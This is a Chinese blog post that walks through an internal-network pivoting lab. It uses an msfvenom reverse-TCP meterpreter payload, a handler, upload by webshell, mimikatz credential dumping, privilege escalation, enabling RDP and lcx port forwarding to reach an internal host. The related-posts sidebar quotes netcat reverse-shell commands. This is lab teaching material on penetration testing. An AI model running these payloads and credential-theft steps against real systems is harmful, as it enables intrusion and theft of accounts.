内网端口转发与代理

已于 2024-04-30 11:21:25 修改
阅读量952 收藏 16
点赞数 23
分类专栏: 网络安全 文章标签: 网络安全
于 2024-04-30 10:40:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaolan458/article/details/138337416
版权

思路:渗透的前提是双方能够建立通信。目前无法和win7建立通信,但是拿到了windows2003的权限,所以可以在Windows2003主机上面建立节点,作为跳板机去访问到内网。

目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
                  发现内网win7和win10
目的:通过控制的win2003  访问win7(IP:10.1.3.136如果是192.168.1.162也可以),
        win10无法远程连接??

攻击机:本地192.168.1.122
                VM kali:192.168.1.146(10.1.2.152)

MSF代理转发通信(正向连接)
1,利用MSF生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
结果:
    msf6 > msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
    [*] exec: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe


2,msf进入监听模式
输入命令设置本地监听,具体命令如下:
启动msf:
        msfconsole
选择工具:
        use exploit/multi/handler
设置攻击语句:
        set payload windows/meterpreter/reverse_tcp
设置监听IP(注意IP地址是本地kali机器的IP地址):
        set lhost 192.168.1.146
设置监听端口:
        set lport 4444
开始监听:
        exploit或者run


3,使用webshell将脚本上传都目标服务器(蚁剑为例)

        2003中,phpstudy的端口为90,

        外网访问 http://192.168.1.200:90/phpinfo.php(相对内网来说)

蚁剑配置IP:192.168.1.200:90/123.php,密码为123
    编码器:选择base64(两个),点击测试,提示测试成功

通过蚁剑上传su.exe,
通过蚁剑的控制台运行su.exe
C:\phpStudy\WWW> su.exe

msf上线
[*] Started reverse TCP handler on 192.168.1.146:4444
[*] Sending stage (175686 bytes) to 192.168.1.200
[*] Meterpreter session 1 opened (192.168.1.146:4444 -> 192.168.1.200:1082) at 2024-04-29 00:57:12 -0400

【win2003中的IIS还有一个内部访问网站,IP为2003的IP(10.1.3.128),端口84,本地可以访问http://10.1.3.128:84

这里有两个网站,IIS的04网站是内网访问,PHPStudy的网站是外网访问,

被一句话木马控制的是php网站,蚁剑上传的木马也是上传到PHP网站内,所以这里跟IIS的网站好像无关。。。】


5,信息收集
调用mimikatz模块:
load mimikatz
收集账号密码:
creds_all
查看当前目标机器IP地址:
ipconfig
需要提升为system权限:
getsystem

查询权限
getuid

6,使用转发工具进行lcx.exe端口转发

        通过蚁剑上传lcx.exe到win2003


7,开启3389远程桌面(其实2003不开启3389,win7开启,也能端口转发,但是怎么开启win7的远程桌面呢?)
run getgui -e

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[-] The specified meterpreter session script could not be found: getgui

上面运行失败,这时可以运行
run post/windows/manage/enable_rdp
结果:成功
meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20240429034339_default_192.168.1.200_host.windows.cle_651229.txt


目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
            发现内网win7和win10
目的,通过控制的win2003访问win7(IP:192.168.1.162),
win10无法远程连接??

攻击机:本地192.168.1.122
        VMkali:192.168.1.146(10.1.2.152)


8,MSF进入shell命令行,执行命令,将目标机器的3389端口转发到攻击机的IP地址和自定义端口上
shell(注意,这里一定要进入shell,否则命令无效)
        lcx.exe -slave 192.168.1.122(攻击机) 53 10.1.3.136(win7,内网其它机器) 3389
        lcx.exe -slave 192.168.1.122 53 10.1.3.136 3389
说明:2003的通过端口转发,把内网另外一台机器的3389端口转发给攻击机53

这样也是可以的,如果不是内网IP的话

9,本地攻击机执行命令实现端口二次转发(lcx工具的规定用法)
打开本机(不是kali,目前是x13)中的
E:\......\工具\工具\lcx
目录下的1.bat,执行以下命令 (这条命令最好比第8条先执行)(其实就是在lcx.exe位置打开cmd.exe)
lcx.exe -listen 53 1234

10,攻击机打开远程桌面连接,直接连接本机的1234端口

目前存在的问题:怎么获取win7的账号密码,怎么开启win7的3389

xiaolan_0558
关注
  • 23
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
内网穿透 - 端口转发
04-25
本文将详细介绍如何使用socket编程与IOCP(I/O完成端口)模型来实现端口转发,以及涉及到的相关文件及其作用。 首先,端口转发的核心在于socket编程。Socket是网络通信的基本接口,它允许程序通过网络发送和接收...
SSH端口转发实现内网穿透的实现
01-10
我们局域网的机器能够访问外网,但是外网不能访问内网。因为内网访问互联网时候能确定外网的地址,外网却不能确定我们局域网内的具体地址。(ip地址有限)如果 我们在访问外网的时候,这个链接让他保持、不断,那么...
正向代理与反向代理,你真的明白吗?
南瓜的博客
04-14 100
Nignx,什么是正向代理、反向代理
内网端口转发
Scorpio_m7
09-26 1745
EarthWorm内网穿透 正向socks5服务器 当目标网络边界存在公网IP且可任意开监听端口 ./ew_linux_x64 -s ssocksd -l 1080 可在该目标机器上开启一个8888的正向连接,然后其他主机可通过SwitchyOmega设置socks5代理为目标主机ip:1080 ,添加这个代理就可以使用了 反向socks5服务器 服务器(外网vps) ./ew_linux_x64 -s rcsocks -l 1080 -e 5555 解释:把1080端口收到的请求转发给5555端口
端口转发代理
最新发布
2301_81475812的博客
06-01 243
代理服务器英文全称是Proxy Server,其功能就是代理网络用户去取得网络信息。形象的说:它是网络信息的中转站。在一般情况下,我们使用网络浏览器直接去连接其他Internet站点取得网络信息时,须送出Request信号来得到回答,然后对方再把信息以bit方式传送回来。代理服务器是介于浏览器和Web服务器之间的一台服务器,有了它之后,浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求,Request信号会先送到代理服务器,由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。
WlMAP:突破内网端口转发映射工具
weixin_30883271的博客
09-01 187
使用说明 Wlmap包括服务端程序和客户端程序两部分 服务端程序Wlmaps一般架设到其它用户可以访问到的地方例如internet,它主要用来记录客户端信息以及端口映射信息,并且转发用户和客户端之间数据。客户端程序主程序完成和Wlmaps的交互,包括认证、映射内部服务到Wlmaps的某个端口、维护数据转发通道同时转发Wlmaps和内部服务之间的数据交互。 第一部分: 服务端Wlmap...
内网端口转发及穿透-
jackjack博客
09-21 9201
内网端口转发及穿透 最近尝试了一些内网端口的转发和内网穿透,现在一起总结一下。 0x01 正向和反向代理 正向代理中,proxy和client同属一个LAN,对server透明; 反向代理中,proxy和server同属一个LAN,对client透明。 实际上proxy在两种代理中做的事都是代为收发请求和响应,不过从结构上来看正好左右互换了下...
iox:端口转发和Intranet代理的工具
03-21
用于端口转发和Intranet代理的工具,就像lcx / ew ,但效果更好 为什么写? lcx和ew很棒,但是可以改进。 当我第一次使用它们时,我很长一段时间都不记得这些复杂的参数,例如tran, slave, rcsocks, sssocks...工作...
内网渗透之端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
windows 端口转发.zip
06-07
- **负载均衡和代理**:端口转发也可以用于分发流量到多个服务器,或者作为代理服务隐藏后端服务器的IP地址。 总的来说,这个“windows 端口转发.zip”压缩包提供了一套可能的端口转发解决方案,结合了OpenSSL库和...
内网端口转发 - 简单记录
fa1c4的blog
07-17 704
常见的端口流量转发工具 (1) SSH (2) EW (3) NetCat (4) LCX 常见目的 (1) 安全运维: 绕过堡垒机/防火墙限制, 建立TCP链接, 对内网服务器进行远程管理 (2) 内网渗透: 绕过堡垒机/防火墙限制, 实现对内网服务器的攻击 分类 (1) 本地转发 (2) 远程转发 (3) 动态转发 本地转发 本地主机开启端口转发功能, 需要在用户机执行 ssh -L 8866:196.168.10.1:23 -fN 196.168.10.2 示意图 远程转发 堡垒机开启端口转发功能
内网端口转发汇总
zrools的博客
10-14 2187
Linuxssh SA 服务器 CA 客户A CB 客户B CA通过SA访问CB服务,在CA上执行ssh USER@HOST_A -P HOST_A_SSH_PORT -L 127.0.0.1:LOCAL_PORT:HOST_B:HOST_B_PORT例:映射远程 MySQL端口至本地 端口 13306ssh root@1.2.3.4 -P 22 -L 127.0.0.1:13306:10.0.0.
内网穿透之端口转发
lionwerson的博客
12-09 2785
1.在后渗透阶段,如果我们拿下了一台服务器的权限,发现在服务器所属的内网中有一台开启了3389或者22端口的主机,但是无法直接连接,是因为目标服务器处在内网中或者没有联网,这个时候我们可以借助内网中另一台可以联网的服务器来作为代理服务器与连接开启3389的服务器进行连接。 2.实验环境: 系统 用户 桥接 192.168.0.0/24 NAT 192.168.11.0/24 win10 管理员 192.168.0.16 ubuntu1 lion1
内网端口转发小技巧
Amire0x的小乐园
11-30 1623
端口转发 NC 反向连接 kali开启监听 nc -lnvp 7777 目标返向连接 nc -e cmd.exe 192.168.95.128 7777 可以执行命令 正向连接 目标开启监听 nc -l -p 5555 -e cmd.exe kali连接 nc -nvv 192.168.95.12 5555 执行命令 lcx 外网无法访问内网,但内网可访问外网 client:转发自己的3389端口到远程端口7777上 lcx.exe -slave rhost
攻防实战:使用Lcx进行内网端口转发
Jim的博客
08-29 3864
在理论上只要网络连接的计算机都是可以访问的,但是在实际中往往由于技术水平等原因,很难实现它;例如局域网中的某台计算机仅仅开放了Web服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服务,这必须进行端口映射等操作才行。端口映射在入侵内网的时候经常用到,特别是要登陆远程终端服务时,使用端口映射就非常方便。   Lcx.exe是一个端口
利用端口转发端口映射实现内网穿透
m0_64940610的博客
06-13 7152
端口转发端口映射都是为了解决内网主机的端口无法被外网直接访问而衍生出来的技术,通过中间服务器进行地址转换,将内部指定主机的某个端口映射为外网服务器某个端口上,当外网用户访问动态域名的指定端口或访问公网IP的指定端口时,自动将该访问请求转交给内网指定主机的某个端口处理,这样就可以实现穿透,让外网用户访问内网主机了,使用内网主机提供的相应服务了。端口映射可以通过防火墙、端口映射软件或软路由系统实现,不需要路由权限,外网用户通过动态域名+端口访问内网主机。确保状态为生效,此时,端口映射配置完成。
干货|内网渗透之端口转发&端口映射
热门推荐
anan的博客
11-09 5万+
端口转发 端口转发,有时被叫做隧道,是安全壳为网络安全通信使用的一种方法。端口转发是转发一个网络端口从一个网络端口转发到另一个网络端口或从一个网络节点转发到另一个网络节点的行为,其使一个外部用户从外部经过一个被激活的NAT路由器到达一个在私有内部IP地址(局域网内网)上的一个端口。 简要说明:端口转发就是将一个端口,这个端口可以本地的端口也可以是访问到任意主机的端口,转发到任意一台可以访问的IP上...
nginx如何实现内网端口转发
04-15
Nginx可以通过反向代理的方式实现内网端口转发。具体操作是在 Nginx 配置文件中配置 upstream 块,将指定的内网 IP 地址和端口作为后端服务器,然后在 location 块中通过 proxy_pass 指令将请求转发到该后端服务器。例如: upstream backend { server 10.10.10.10:8080; } location / { proxy_pass http://backend; } 这样,当外部请求访问该 Nginx 服务器的某个端口时,Nginx会将请求转发到指定的内网 IP 地址和端口上,实现内网端口转发

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值